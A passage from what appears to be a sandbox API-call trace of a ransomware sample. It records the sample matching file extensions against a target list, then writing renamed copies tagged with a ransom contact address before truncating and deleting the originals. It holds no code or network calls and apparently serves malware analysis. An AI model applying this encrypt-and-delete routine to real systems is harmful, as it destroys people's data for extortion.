(lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.760] lstrlenW (lpString=".zip") returned 4 [0046.760] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.760] lstrlenW (lpString=".rar") returned 4 [0046.760] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.760] lstrlenW (lpString=".bz2") returned 4 [0046.760] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.760] lstrlenW (lpString=".7z") returned 3 [0046.760] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.760] lstrlenW (lpString=".dbf") returned 4 [0046.760] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.760] lstrlenW (lpString=".1cd") returned 4 [0046.760] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.760] lstrlenW (lpString=".jpg") returned 4 [0046.760] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.761] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.761] lstrlenW (lpString=".doc") returned 4 [0046.761] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.761] lstrlenW (lpString=".docx") returned 5 [0046.761] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.761] lstrlenW (lpString=".pdf") returned 4 [0046.761] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.761] lstrlenW (lpString=".xls") returned 4 [0046.761] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.761] lstrlenW (lpString=".xlsx") returned 5 [0046.761] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.761] lstrlenW (lpString=".ppt") returned 4 [0046.761] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.761] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.761] lstrlenW (lpString=".zip") returned 4 [0046.761] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.761] lstrlenW (lpString=".rar") returned 4 [0046.761] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.761] lstrlenW (lpString=".bz2") returned 4 [0046.761] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.761] lstrlenW (lpString=".7z") returned 3 [0046.761] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.761] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.761] lstrlenW (lpString=".dbf") returned 4 [0046.761] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.761] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.761] lstrlenW (lpString=".1cd") returned 4 [0046.761] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.761] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0046.761] lstrlenW (lpString=".jpg") returned 4 [0046.761] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.761] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0046.762] lstrlenW (lpString="LocalizedData.xml") returned 17 [0046.762] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.762] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=77748) returned 1 [0046.762] CloseHandle (hObject=0x2e4) returned 1 [0046.762] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 0x80 [0046.762] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.762] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.762] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.762] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.762] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0046.762] GetLastError () returned 0x0 [0046.762] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x12fb4, lpOverlapped=0x0) returned 1 [0046.767] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x12fc0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x12fc0, lpOverlapped=0x0) returned 1 [0046.768] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.768] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf6, lpOverlapped=0x0) returned 1 [0046.768] SetEndOfFile (hFile=0x2cc) returned 1 [0046.769] CloseHandle (hObject=0x2cc) returned 1 [0046.770] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.770] SetEndOfFile (hFile=0x2e4) returned 1 [0046.771] CloseHandle (hObject=0x2e4) returned 1 [0046.772] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.772] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 1 [0046.772] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.772] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.772] lstrlenW (lpString=".doc") returned 4 [0046.772] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.772] lstrlenW (lpString=".docx") returned 5 [0046.772] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.772] lstrlenW (lpString=".pdf") returned 4 [0046.772] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.772] lstrlenW (lpString=".xls") returned 4 [0046.772] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.772] lstrlenW (lpString=".xlsx") returned 5 [0046.772] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.772] lstrlenW (lpString=".ppt") returned 4 [0046.772] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.772] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.772] lstrlenW (lpString=".zip") returned 4 [0046.772] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.772] lstrlenW (lpString=".rar") returned 4 [0046.773] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString=".bz2") returned 4 [0046.773] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString=".7z") returned 3 [0046.773] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.773] lstrlenW (lpString=".dbf") returned 4 [0046.773] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.773] lstrlenW (lpString=".1cd") returned 4 [0046.773] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.773] lstrlenW (lpString=".jpg") returned 4 [0046.773] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.773] lstrlenW (lpString=".doc") returned 4 [0046.773] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString=".docx") returned 5 [0046.773] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.773] lstrlenW (lpString=".pdf") returned 4 [0046.773] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString=".xls") returned 4 [0046.773] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString=".xlsx") returned 5 [0046.773] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.773] lstrlenW (lpString=".ppt") returned 4 [0046.773] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.773] lstrlenW (lpString=".zip") returned 4 [0046.773] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.773] lstrlenW (lpString=".rar") returned 4 [0046.773] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString=".bz2") returned 4 [0046.773] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.773] lstrlenW (lpString=".7z") returned 3 [0046.773] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.774] lstrlenW (lpString=".dbf") returned 4 [0046.774] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.774] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.774] lstrlenW (lpString=".1cd") returned 4 [0046.774] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.774] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0046.774] lstrlenW (lpString=".jpg") returned 4 [0046.774] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.774] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0046.774] lstrlenW (lpString="eula.rtf") returned 8 [0046.774] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.774] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=3419) returned 1 [0046.774] CloseHandle (hObject=0x2e4) returned 1 [0046.774] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 0x80 [0046.774] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.774] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.774] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.775] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.775] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0046.775] GetLastError () returned 0x0 [0046.775] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xd5b, lpOverlapped=0x0) returned 1 [0047.327] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xd60, lpOverlapped=0x0) returned 1 [0047.328] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.328] WriteFile (in: hFile=0x2cc, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.328] SetEndOfFile (hFile=0x2cc) returned 1 [0047.329] CloseHandle (hObject=0x2cc) returned 1 [0047.330] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.330] SetEndOfFile (hFile=0x2e4) returned 1 [0047.330] CloseHandle (hObject=0x2e4) returned 1 [0047.331] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.331] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 1 [0047.331] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.331] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.331] lstrlenW (lpString=".doc") returned 4 [0047.331] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.331] lstrlenW (lpString=".docx") returned 5 [0047.332] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.332] lstrlenW (lpString=".pdf") returned 4 [0047.332] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.332] lstrlenW (lpString=".xls") returned 4 [0047.332] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.332] lstrlenW (lpString=".xlsx") returned 5 [0047.332] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.332] lstrlenW (lpString=".ppt") returned 4 [0047.332] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.332] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.332] lstrlenW (lpString=".zip") returned 4 [0047.332] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.332] lstrlenW (lpString=".rar") returned 4 [0047.332] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.332] lstrlenW (lpString=".bz2") returned 4 [0047.332] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.332] lstrlenW (lpString=".7z") returned 3 [0047.332] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.332] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.400] lstrlenW (lpString=".dbf") returned 4 [0047.400] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.400] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.400] lstrlenW (lpString=".1cd") returned 4 [0047.401] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.401] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.401] lstrlenW (lpString=".jpg") returned 4 [0047.401] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.444] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.444] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.444] lstrlenW (lpString=".doc") returned 4 [0047.444] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.444] lstrlenW (lpString=".docx") returned 5 [0047.444] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.445] lstrlenW (lpString=".pdf") returned 4 [0047.445] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.445] lstrlenW (lpString=".xls") returned 4 [0047.445] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.445] lstrlenW (lpString=".xlsx") returned 5 [0047.445] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.445] lstrlenW (lpString=".ppt") returned 4 [0047.445] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.445] lstrlenW (lpString=".zip") returned 4 [0047.445] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.445] lstrlenW (lpString=".rar") returned 4 [0047.445] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.445] lstrlenW (lpString=".bz2") returned 4 [0047.445] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.445] lstrlenW (lpString=".7z") returned 3 [0047.445] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.445] lstrlenW (lpString=".dbf") returned 4 [0047.445] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.445] lstrlenW (lpString=".1cd") returned 4 [0047.445] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0047.445] lstrlenW (lpString=".jpg") returned 4 [0047.445] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.445] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.446] lstrlenW (lpString="eula.rtf") returned 8 [0047.446] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.446] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=4040) returned 1 [0047.446] CloseHandle (hObject=0x2cc) returned 1 [0047.446] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 0x80 [0047.446] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.446] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.446] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.446] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.446] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.447] GetLastError () returned 0x0 [0047.447] ReadFile (in: hFile=0x2cc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xfc8, lpOverlapped=0x0) returned 1 [0047.509] WriteFile (in: hFile=0x2d0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xfd0, lpOverlapped=0x0) returned 1 [0047.510] ReadFile (in: hFile=0x2cc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.510] WriteFile (in: hFile=0x2d0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.510] SetEndOfFile (hFile=0x2d0) returned 1 [0047.511] CloseHandle (hObject=0x2d0) returned 1 [0047.513] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.513] SetEndOfFile (hFile=0x2cc) returned 1 [0047.514] CloseHandle (hObject=0x2cc) returned 1 [0047.514] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.514] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 1 [0047.514] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.514] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.514] lstrlenW (lpString=".doc") returned 4 [0047.514] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.514] lstrlenW (lpString=".docx") returned 5 [0047.514] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.514] lstrlenW (lpString=".pdf") returned 4 [0047.514] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.515] lstrlenW (lpString=".xls") returned 4 [0047.515] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.515] lstrlenW (lpString=".xlsx") returned 5 [0047.515] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.515] lstrlenW (lpString=".ppt") returned 4 [0047.515] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.515] lstrlenW (lpString=".zip") returned 4 [0047.515] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.515] lstrlenW (lpString=".rar") returned 4 [0047.515] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.515] lstrlenW (lpString=".bz2") returned 4 [0047.515] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.515] lstrlenW (lpString=".7z") returned 3 [0047.515] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.515] lstrlenW (lpString=".dbf") returned 4 [0047.515] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.515] lstrlenW (lpString=".1cd") returned 4 [0047.515] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.515] lstrlenW (lpString=".jpg") returned 4 [0047.515] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.515] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.515] lstrlenW (lpString=".doc") returned 4 [0047.516] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.516] lstrlenW (lpString=".docx") returned 5 [0047.516] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.516] lstrlenW (lpString=".pdf") returned 4 [0047.516] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.516] lstrlenW (lpString=".xls") returned 4 [0047.516] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.516] lstrlenW (lpString=".xlsx") returned 5 [0047.516] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.516] lstrlenW (lpString=".ppt") returned 4 [0047.516] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.516] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.516] lstrlenW (lpString=".zip") returned 4 [0047.516] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.516] lstrlenW (lpString=".rar") returned 4 [0047.516] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.516] lstrlenW (lpString=".bz2") returned 4 [0047.516] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.516] lstrlenW (lpString=".7z") returned 3 [0047.516] lstrcmpiW 